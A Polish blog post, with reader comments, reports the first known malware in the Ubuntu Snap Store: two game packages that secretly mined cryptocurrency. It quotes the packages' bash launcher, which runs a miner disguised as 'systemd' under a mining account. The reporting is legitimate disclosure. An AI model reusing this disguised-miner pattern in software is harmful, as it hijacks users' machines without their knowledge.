Syndrom sukcesu, czyli pierwsze malware w Ubuntu Snap Store

Ubuntu Snap Store odnotował właśnie pierwszy sukces w postaci nawiązania do osiągnięć wielkich konkurentów i ich sklepów z oprogramowaniem. Społeczność nie doceniła tego doniosłego faktu. Sprawa została zgłoszona jako błąd #651 a programy których dotyczyło zgłoszenie zostały usunięte. Użytkowniku Ubuntu – zacznij się oswajać z trwogą przed malware.

Unikajcie ofert od Nicolasa Tomba
Sklep Ubuntu z paczkami Snap miał przybliżyć milionom użytkowników ogrom oprogramowania linuksowego, jak też stworzyć okazję deweloperom do łatwego podzielenia się efektami swojej pracy. Jednak zasady tej współpracy zostały podparte zbyt liberalnym optymizmem.

Jak można przeczytać w doniesieniu #651, użytkownicy odkryli że co najmniej dwa programy oferowane w ramach sklepu z paczkami Snap zawierają malware. Chodzi o 2048buntu oraz Hextris, które opublikował w Ubuntu Snaps Store „zaradny” Nicolas Tomb. Programy zawierały skrypty uruchamiające na komputera nieświadomych użytkowników kopalnię bitcoinów.

Wartym odnotowania jest również fakt, że większości swoich snapów Nicolas określił jako oprogramowanie własnościowe, za pomocą stosownej licencji. Najwidoczniej autor nie czuje się związany ze społecznością i nie zamierza dzielić z nią ani swoich kodów źródłowych ani zapewne przyszłych dochodów wypracowanych przez jego skrypty.

Wgląd w dodatki instalowane przez te paczki nie pozostawia złudzeń:

#!/bin/bash

currency=bcn
name=2048buntu

{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Jak do tego doszło? Cóż, nieustanne zarzuty wobec ludzi odpowiedzialnych za sklep Ubuntu doprowadziły do tego, że uproszczono zasadę publikowania paczek Snap. Nie ma tu takiego sita jak w przypadku paczek .deb które trafiają do oficjalnego repozytorium. Pojawienie się malware (i w przyszłości zapewne innych) to była kwestia czasu.

Obydwie paczki (jak i inne osiągnięcia Nicolasa) zostały już usunięte z Ubuntu Snap Store. Przypuszczalnie jednak mogą krążyć jeszcze gdzieś po internecie (Google Cache? Github?).

Czy stoimy właśnie u progu nowej linuksowej jakości? 

13 komentarzy

  1. Znalazłem literówkę w 3 wierszu tekstu:

    “Użytkowników Ubuntu” zamiast Użytkowniku Ubuntu…

  2. Jeśli Ubuntu miałoby zastąpić Windowsy, to jego twórcy dobrze kombinują 😉
    A tak poważnie, to od początku uważałem,że te całe snapy i temu podobne wynalazki to poroniony pomysł.

  3. Nie wiem jak można używać ubuntu. Po tych historiach z amazonem itp dotyczących prywatności to już lepiej mieć windowsa chociaż można pograć jak człowiek, a chcesz linuxa to zainstaluj Debiana lub coś opartego o Red Hat.

  4. Hmmm… prostacka gierka, która ma 138 Mb zamkniętego kodu z zależnościami… śmierdzi na odległość.

  5. Google cache? Github? Facebook? Biedronka? Skrzynka pocztowa? Wycieraczka?

  6. Plus jest taki, że nawet jak ktoś upchnie malware lub inne „coś” w snapie, to i tak działa sobie w swojej piaskownicy. Problemem jednak może być pasożytowanie na zasobach komputera.

  7. Z całym szacunkiem, ale takie bicie piany jest naprawdę zbędne. Nie dokilka się niczego, bo tak czy siak musiałby używać snapa (jako polecenie!) lokalnie. Zbędne sianie FUD-u.

  8. Psułeś pakiety w Archu, że musiałem przenieść się na Funtoo.
    Arch stał się dystrybucją dla gimbazy, aby przechwalać się, że mają najnowsze jądro z całym tym syfem systemd, pulseaudio.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Post comment

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.